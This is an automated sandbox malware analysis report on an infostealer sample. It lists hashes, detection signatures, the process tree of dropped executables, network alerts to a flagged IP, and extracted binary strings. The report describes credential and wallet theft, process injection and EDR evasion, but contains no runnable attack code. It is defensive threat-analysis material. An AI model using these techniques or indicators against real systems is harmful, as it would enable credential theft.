Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LVkAi4PBv6.exe

Overview

General Information

Sample name:LVkAi4PBv6.exe
renamed because original name is a hash value
Original sample name:dc1a25a3cecfd804e569a7238ba1ec7f.exe
Analysis ID:1585283
MD5:dc1a25a3cecfd804e569a7238ba1ec7f
SHA1:7bf13bcd7957fa71d6e0d70d2a0e0b578c040a62
SHA256:08e80182805b40159b51722d3993635343dd14b67e262820599031fa9ecd96d0
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

  • System is w10x64
  • LVkAi4PBv6.exe (PID: 6312 cmdline: "C:\Users\user\Desktop\LVkAi4PBv6.exe" MD5: DC1A25A3CECFD804E569A7238BA1EC7F)
    • LVkAi4PBv6.exe (PID: 968 cmdline: "C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe" -burn.clean.room="C:\Users\user\Desktop\LVkAi4PBv6.exe" -burn.filehandle.attached=528 -burn.filehandle.self=552 MD5: 9C540950F5A8981844FF33BFC55D2F36)
      • AdobeSync.exe (PID: 6388 cmdline: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe MD5: F778E9136AB0DB9DE9802A7043DE50A7)
        • AdobeSync.exe (PID: 6496 cmdline: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe MD5: F778E9136AB0DB9DE9802A7043DE50A7)
          • cmd.exe (PID: 2756 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 3396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • LocalCtrl_alpha_v3.exe (PID: 1532 cmdline: C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe MD5: 967F4470627F823F4D7981E511C9824F)
              • msedge.exe (PID: 5580 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
                • msedge.exe (PID: 3868 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2008,i,10255780505562275753,1680696743736403,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • AdobeSync.exe (PID: 2860 cmdline: "C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe" MD5: F778E9136AB0DB9DE9802A7043DE50A7)
    • cmd.exe (PID: 3084 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • LocalCtrl_alpha_v3.exe (PID: 5440 cmdline: C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe MD5: 967F4470627F823F4D7981E511C9824F)
  • msedge.exe (PID: 920 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 2516 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6120 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7160 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7276 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7316 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7128 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7156 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Use Short Name Path in Command Line
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe, ParentCommandLine: C:\Windows\SysWOW64\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2756, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe, ProcessId: 1532, ProcessName: LocalCtrl_alpha_v3.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-07T13:18:55.124619+010020283713Unknown Traffic192.168.2.749967188.114.97.3443TCP
2025-01-07T13:18:56.443341+010020283713Unknown Traffic192.168.2.749976188.114.97.3443TCP
2025-01-07T13:18:57.293419+010020283713Unknown Traffic192.168.2.749977188.114.97.3443TCP
2025-01-07T13:19:30.283450+010020283713Unknown Traffic192.168.2.750088188.114.97.3443TCP
2025-01-07T13:19:31.679881+010020283713Unknown Traffic192.168.2.750089188.114.97.3443TCP
2025-01-07T13:19:32.466637+010020283713Unknown Traffic192.168.2.750090188.114.97.3443TCP
2025-01-07T13:19:32.706134+010020283713Unknown Traffic192.168.2.750091188.114.97.3443TCP
2025-01-07T13:19:33.599585+010020283713Unknown Traffic192.168.2.750092188.114.97.3443TCP
2025-01-07T13:19:33.815698+010020283713Unknown Traffic192.168.2.750093188.114.97.3443TCP
2025-01-07T13:19:34.654268+010020283713Unknown Traffic192.168.2.750094188.114.97.3443TCP
2025-01-07T13:19:34.840859+010020283713Unknown Traffic192.168.2.750095188.114.97.3443TCP
2025-01-07T13:19:36.070306+010020283713Unknown Traffic192.168.2.750096188.114.97.3443TCP
2025-01-07T13:19:36.332508+010020283713Unknown Traffic192.168.2.750097188.114.97.3443TCP
2025-01-07T13:19:37.199026+010020283713Unknown Traffic192.168.2.750098188.114.97.3443TCP
2025-01-07T13:19:37.575118+010020283713Unknown Traffic192.168.2.750099188.114.97.3443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://sn.comAvira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AXE8SharedExpat.dllReversingLabs: Detection: 30%
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AXE8SharedExpat.dllReversingLabs: Detection: 30%
Multi AV Scanner detection for submitted file
Source: LVkAi4PBv6.exeReversingLabs: Detection: 23%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0087A0BB DecryptFileW,0_2_0087A0BB
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0089FA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,0_2_0089FA62
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_00879E9E DecryptFileW,DecryptFileW,0_2_00879E9E
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005DA0BB DecryptFileW,2_2_005DA0BB
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005FFA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,2_2_005FFA62
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005D9E9E DecryptFileW,DecryptFileW,2_2_005D9E9E
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeCode function: 3_2_00100070 CryptUnprotectData,_CxxThrowException,3_2_00100070
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeCode function: 3_2_001000D0 CryptProtectData,_CxxThrowException,3_2_001000D0
Source: LVkAi4PBv6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeFile opened: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\msvcr90.dllJump to behavior
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49967 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49976 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49977 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50088 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50089 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50090 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50091 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50092 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50093 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50094 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50095 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50096 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50097 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50098 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50099 version: TLS 1.2
Source: LVkAi4PBv6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: [C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\\CRX_INSTALL\content_scripts source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2124211584.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2123111825.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2142328136.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2142540338.0000000002E2A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845197320.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844233653.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844975114.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843391555.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844119867.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845197320.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844233653.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844975114.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843391555.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844119867.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ^\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdb9 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122266355.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E43000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: m\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\6 source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2208471552.0000000002DE4000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: p\Symbols\ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2124211584.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2123111825.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2142328136.0000000002E24000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: AdobeSync.exe, 00000003.00000002.1393806393.000000000A14C000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394035216.000000000A4A0000.00000004.00000800.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1458777606.000000000A457000.00000004.00000001.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1458405144.0000000009D49000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1458581198.000000000A0A0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685225598.000000000462B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685843617.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: >C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.ini source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SharePoint.pdb* source: LVkAi4PBv6.exe, 00000002.00000002.1366762621.000000006D38A000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: _C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\RX_INSTALL\_locales source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2~ source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845197320.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844233653.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844975114.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843391555.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844119867.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2124211584.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1841979791.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2123111825.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: 8\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdbM source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122266355.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E43000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.iniG source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121641973.0000000002EBA000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831y source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Z\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\6 source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2208471552.0000000002DE4000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831C source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SharePoint.pdb source: LVkAi4PBv6.exe, 00000002.00000002.1366762621.000000006D38A000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.iniC source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845197320.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844233653.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844975114.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843391555.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844119867.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: p\Symbols\ntkrnlmp.pdbX source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2124211584.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2123111825.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2142328136.0000000002E24000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
